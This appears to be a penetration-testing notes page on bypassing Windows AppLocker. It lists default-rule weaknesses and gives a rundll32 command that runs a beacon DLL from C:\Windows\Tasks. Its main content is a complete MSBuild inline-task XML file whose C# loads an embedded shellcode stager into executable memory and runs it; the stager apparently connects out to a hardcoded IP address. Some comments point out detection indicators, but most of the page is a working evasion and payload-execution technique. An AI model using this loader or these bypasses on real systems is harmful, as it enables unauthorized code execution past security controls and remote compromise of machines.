# AppLocker

![](/files/B9kEWdnV3ZnsBpne8fjJ)

```shell
# https://github.com/PowerShell/GPRegistryPolicyParser
# Parse AppLocker Policy
Import-Module .\GPRegistryPolicyParser.psm1
Parse-PolFile -Path "\\marvel.local\sysvol\MARVEL.local\Policies\{FFA03B11-A48D-4B85-BC64-6E434DB8B7B2}\Machine\Registry.pol"
```

![](/files/x76Z7sOFt3RoW5xno3Eo)

#### Default Rules Bypass:

1. Executing untrusted code through trusted LOLBAS binaries (living-off-the-land binaries and scripts that the default rules already allow to run).
2. Finding user-writable directories within "trusted" paths (the default path rules allow everything under the Windows and Program Files directories, so any writable subdirectory there becomes an execution path).
3. By default, AppLocker's default rules do not restrict members of the Administrators group at all.

```shell
# Example of a directory under C:\Windows that standard users can write to
C:\Windows\Tasks\*

# Execute the DLL from the writable path through rundll32.exe (a trusted Windows binary)
C:\Windows\System32\rundll32.exe C:\Windows\Tasks\beacon.dll,StartW
```

#### MSBUILD (Bypass2)

```powershell
# LOLBAS (https://lolbas-project.github.io/)
msbuild.exe shell.xml  
```

#### C# Code Inside XML (Bypass2 Cont.)

```xml
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
         <!-- This inline task executes shellcode: MSBuild compiles the C# below and runs it inside msbuild.exe, a Microsoft-signed binary that the default AppLocker rules allow. -->
         <!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe SimpleTasks.csproj -->
         <!-- Save This File And Execute The Above Command -->
         <!-- Author: Casey Smith, Twitter: @subTee -->
         <!-- License: BSD 3-Clause -->
	  <Target Name="Hello">
	    <ClassExample />
	  </Target>
	  <UsingTask
	    TaskName="ClassExample"
	    TaskFactory="CodeTaskFactory"
	    AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
	    <Task>
	    
	      <Code Type="Class" Language="cs">
	      <![CDATA[
		using System;
		using System.Runtime.InteropServices;
		using Microsoft.Build.Framework;
		using Microsoft.Build.Utilities;
		// Inline MSBuild task (CodeTaskFactory): the <ClassExample /> target above makes MSBuild
		// compile this class and call Execute() inside msbuild.exe itself, so the payload runs
		// under a trusted Windows binary rather than as a separate executable.
		public class ClassExample :  Task, ITask
		{         
		  // Win32 VirtualAlloc flags. 0x40 = PAGE_EXECUTE_READWRITE: the buffer is mapped RWX,
		  // which is a high-signal indicator for memory scanners and EDR.
		  private static UInt32 MEM_COMMIT = 0x1000;          
		  private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;          
		  // kernel32 P/Invoke declarations used by Execute().
		  [DllImport("kernel32")]
		  private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr,
		  UInt32 size, UInt32 flAllocationType, UInt32 flProtect);          
		  [DllImport("kernel32")]
		    private static extern IntPtr CreateThread(            
		    UInt32 lpThreadAttributes,
		    UInt32 dwStackSize,
		    UInt32 lpStartAddress,
		    IntPtr param,
		    UInt32 dwCreationFlags,
		    ref UInt32 lpThreadId           
		    );
		  [DllImport("kernel32")]
		  private static extern UInt32 WaitForSingleObject(           
		    IntPtr hHandle,
		    UInt32 dwMilliseconds
		    );          
		  // Task entry point invoked by MSBuild. Classic self-injection sequence: allocate RWX
		  // memory, copy the byte array in, start a thread at that address, block until it exits.
		  // Always returns true, so the "build" reports success regardless of what the thread did.
		  public override bool Execute()
		  {
		    // Embedded payload bytes (the original note says to replace them). Analyst note:
		    // decoding the array yields plaintext ASCII — a "wininet" string, a URI path, a
		    // Firefox User-Agent header and an IPv4 address — the usual HTTP-stager artifacts
		    // to pull as indicators.
		    byte[] shellcode = new byte[] { 0xfc, 0xe8, 0x89, 0x00, 0x00, 0x00, 0x60, 0x89, 0xe5, 0x31, 0xd2, 0x64, 0x8b, 0x52, 0x30, 0x8b, 0x52, 0x0c, 0x8b, 0x52, 0x14, 0x8b, 0x72, 0x28, 0x0f, 0xb7, 0x4a, 0x26, 0x31, 0xff, 0x31, 0xc0, 0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c, 0x20, 0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0xe2, 0xf0, 0x52, 0x57, 0x8b, 0x52, 0x10, 0x8b, 0x42, 0x3c, 0x01, 0xd0, 0x8b, 0x40, 0x78, 0x85, 0xc0, 0x74, 0x4a, 0x01, 0xd0, 0x50, 0x8b, 0x48, 0x18, 0x8b, 0x58, 0x20, 0x01, 0xd3, 0xe3, 0x3c, 0x49, 0x8b, 0x34, 0x8b, 0x01, 0xd6, 0x31, 0xff, 0x31, 0xc0, 0xac, 0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0x38, 0xe0, 0x75, 0xf4, 0x03, 0x7d, 0xf8, 0x3b, 0x7d, 0x24, 0x75, 0xe2, 0x58, 0x8b, 0x58, 0x24, 0x01, 0xd3, 0x66, 0x8b, 0x0c, 0x4b, 0x8b, 0x58, 0x1c, 0x01, 0xd3, 0x8b, 0x04, 0x8b, 0x01, 0xd0, 0x89, 0x44, 0x24, 0x24, 0x5b, 0x5b, 0x61, 0x59, 0x5a, 0x51, 0xff, 0xe0, 0x58, 0x5f, 0x5a, 0x8b, 0x12, 0xeb, 0x86, 0x5d, 0x68, 0x6e, 0x65, 0x74, 0x00, 0x68, 0x77, 0x69, 0x6e, 0x69, 0x54, 0x68, 0x4c, 0x77, 0x26, 0x07, 0xff, 0xd5, 0x31, 0xff, 0x57, 0x57, 0x57, 0x57, 0x57, 0x68, 0x3a, 0x56, 0x79, 0xa7, 0xff, 0xd5, 0xe9, 0x84, 0x00, 0x00, 0x00, 0x5b, 0x31, 0xc9, 0x51, 0x51, 0x6a, 0x03, 0x51, 0x51, 0x68, 0x50, 0x00, 0x00, 0x00, 0x53, 0x50, 0x68, 0x57, 0x89, 0x9f, 0xc6, 0xff, 0xd5, 0xeb, 0x70, 0x5b, 0x31, 0xd2, 0x52, 0x68, 0x00, 0x02, 0x40, 0x84, 0x52, 0x52, 0x52, 0x53, 0x52, 0x50, 0x68, 0xeb, 0x55, 0x2e, 0x3b, 0xff, 0xd5, 0x89, 0xc6, 0x83, 0xc3, 0x50, 0x31, 0xff, 0x57, 0x57, 0x6a, 0xff, 0x53, 0x56, 0x68, 0x2d, 0x06, 0x18, 0x7b, 0xff, 0xd5, 0x85, 0xc0, 0x0f, 0x84, 0xc3, 0x01, 0x00, 0x00, 0x31, 0xff, 0x85, 0xf6, 0x74, 0x04, 0x89, 0xf9, 0xeb, 0x09, 0x68, 0xaa, 0xc5, 0xe2, 0x5d, 0xff, 0xd5, 0x89, 0xc1, 0x68, 0x45, 0x21, 0x5e, 0x31, 0xff, 0xd5, 0x31, 0xff, 0x57, 0x6a, 0x07, 0x51, 0x56, 0x50, 0x68, 0xb7, 0x57, 0xe0, 0x0b, 0xff, 0xd5, 0xbf, 0x00, 0x2f, 0x00, 0x00, 0x39, 0xc7, 0x74, 0xb7, 0x31, 0xff, 0xe9, 0x91, 0x01, 0x00, 0x00, 0xe9, 0xc9, 0x01, 0x00, 0x00, 0xe8, 0x8b, 0xff, 0xff, 0xff, 0x2f, 0x69, 0x6d, 0x61, 
0x67, 0x65, 0x33, 0x32, 0x2e, 0x67, 0x69, 0x66, 0x00, 0xbd, 0x12, 0x57, 0x44, 0x54, 0xcc, 0xf9, 0x59, 0x98, 0xc3, 0xa2, 0x58, 0x66, 0xd7, 0xe1, 0xf4, 0xf2, 0xcb, 0x99, 0xb0, 0x60, 0x5c, 0x82, 0x97, 0xf7, 0x36, 0xc6, 0x70, 0x03, 0x74, 0x71, 0x31, 0x73, 0x4b, 0xde, 0xa8, 0x04, 0xcc, 0xc5, 0x50, 0xc3, 0x1f, 0xd5, 0x95, 0xae, 0x94, 0xde, 0x6c, 0xc5, 0xc9, 0x8d, 0xcf, 0xa3, 0x4b, 0x73, 0x43, 0x7b, 0xd2, 0xd6, 0x0f, 0xed, 0xea, 0x02, 0xde, 0xbf, 0x0d, 0x00, 0x55, 0x73, 0x65, 0x72, 0x2d, 0x41, 0x67, 0x65, 0x6e, 0x74, 0x3a, 0x20, 0x4d, 0x6f, 0x7a, 0x69, 0x6c, 0x6c, 0x61, 0x2f, 0x35, 0x2e, 0x30, 0x20, 0x28, 0x57, 0x69, 0x6e, 0x64, 0x6f, 0x77, 0x73, 0x20, 0x4e, 0x54, 0x20, 0x31, 0x30, 0x2e, 0x30, 0x3b, 0x20, 0x57, 0x69, 0x6e, 0x36, 0x34, 0x3b, 0x20, 0x78, 0x36, 0x34, 0x3b, 0x20, 0x72, 0x76, 0x3a, 0x38, 0x39, 0x2e, 0x30, 0x29, 0x20, 0x47, 0x65, 0x63, 0x6b, 0x6f, 0x2f, 0x32, 0x30, 0x31, 0x30, 0x30, 0x31, 0x30, 0x31, 0x20, 0x46, 0x69, 0x72, 0x65, 0x66, 0x6f, 0x78, 0x2f, 0x38, 0x39, 0x2e, 0x30, 0x0d, 0x0a, 0x00, 0x2c, 0x9d, 0x25, 0x4d, 0x5b, 0xdd, 0xe4, 0x73, 0xb5, 0x48, 0xd7, 0x62, 0x8f, 0x90, 0xc1, 0x4f, 0x39, 0x64, 0x4c, 0xd1, 0x92, 0xaa, 0xd2, 0x53, 0x71, 0x52, 0xe4, 0x20, 0x23, 0x63, 0x4d, 0x91, 0x5f, 0xfc, 0x30, 0x62, 0xc2, 0xcf, 0xa0, 0x00, 0x13, 0x89, 0xdd, 0x45, 0xc9, 0x3f, 0x48, 0x93, 0xa8, 0x0e, 0x69, 0xd6, 0x11, 0x7e, 0xf0, 0x84, 0x96, 0xbb, 0xaf, 0x8a, 0xd2, 0x37, 0x32, 0x63, 0x2c, 0x36, 0x37, 0xd1, 0x07, 0x63, 0x26, 0xcc, 0xe8, 0x02, 0x2e, 0xa5, 0x3e, 0x13, 0xfc, 0x64, 0x7e, 0xf2, 0x19, 0x4d, 0x56, 0x74, 0x0f, 0x24, 0x87, 0x2c, 0xb8, 0x1b, 0x40, 0xd9, 0x3a, 0xbd, 0xab, 0xa3, 0x32, 0xdd, 0x95, 0x43, 0x9c, 0x78, 0xbe, 0x0c, 0xd3, 0xd5, 0x34, 0xc1, 0xed, 0x66, 0x60, 0x4f, 0x5f, 0xbd, 0x5b, 0xd0, 0x75, 0x3c, 0x06, 0x27, 0x60, 0x88, 0xbc, 0xa5, 0x9a, 0xd8, 0x7f, 0x62, 0x10, 0xb8, 0xa5, 0xb9, 0xcd, 0xd3, 0x15, 0x2c, 0xe1, 0xad, 0xb4, 0xd7, 0x54, 0x46, 0xa4, 0x37, 0x95, 0xea, 0x9b, 0x15, 0xb4, 0xaf, 0xea, 0x93, 0x49, 0x6b, 0xe8, 0x50, 0xc7, 0x16, 0x87, 0xed, 0x2b, 0x99, 
0xdb, 0x03, 0x6f, 0xb7, 0x29, 0xf0, 0xdb, 0x69, 0x1b, 0xa8, 0xb0, 0xe0, 0x85, 0x19, 0x34, 0x42, 0xb4, 0x12, 0xd6, 0x68, 0x26, 0x13, 0x04, 0x2c, 0xe1, 0xb3, 0x6b, 0xc6, 0x73, 0x92, 0xb7, 0x15, 0x26, 0xb9, 0x11, 0x11, 0xf4, 0x51, 0xe2, 0x35, 0x3a, 0x73, 0xe7, 0xbc, 0xd7, 0x31, 0x00, 0x68, 0xf0, 0xb5, 0xa2, 0x56, 0xff, 0xd5, 0x6a, 0x40, 0x68, 0x00, 0x10, 0x00, 0x00, 0x68, 0x00, 0x00, 0x40, 0x00, 0x57, 0x68, 0x58, 0xa4, 0x53, 0xe5, 0xff, 0xd5, 0x93, 0xb9, 0x28, 0x00, 0x00, 0x00, 0x01, 0xd9, 0x51, 0x53, 0x89, 0xe7, 0x57, 0x68, 0x00, 0x20, 0x00, 0x00, 0x53, 0x56, 0x68, 0x12, 0x96, 0x89, 0xe2, 0xff, 0xd5, 0x85, 0xc0, 0x74, 0xc6, 0x8b, 0x07, 0x01, 0xc3, 0x85, 0xc0, 0x75, 0xe5, 0x58, 0xc3, 0xe8, 0xa9, 0xfd, 0xff, 0xff, 0x31, 0x39, 0x32, 0x2e, 0x31, 0x36, 0x38, 0x2e, 0x32, 0x32, 0x32, 0x2e, 0x37, 0x36, 0x00, 0x12, 0x34, 0x56, 0x78 };
		      
		    // Private RWX allocation sized to the payload, then the bytes are copied into it.
		    UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length,MEM_COMMIT, PAGE_EXECUTE_READWRITE);
		    Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length);
		    IntPtr hThread = IntPtr.Zero;
		    UInt32 threadId = 0;
		    IntPtr pinfo = IntPtr.Zero;
		    // New thread whose start address is the heap buffer above, not a module — the
		    // "thread start outside any image" condition that thread-creation telemetry keys on.
		    hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
		    // 0xFFFFFFFF is INFINITE: msbuild.exe stays alive for as long as the payload thread
		    // runs, so a long-lived msbuild.exe producing no build output is itself an anomaly.
		    WaitForSingleObject(hThread, 0xFFFFFFFF);
		    return true;
		  }
		}   
	      ]]>
	      </Code>
	    </Task>
	  </UsingTask>
	</Project
```

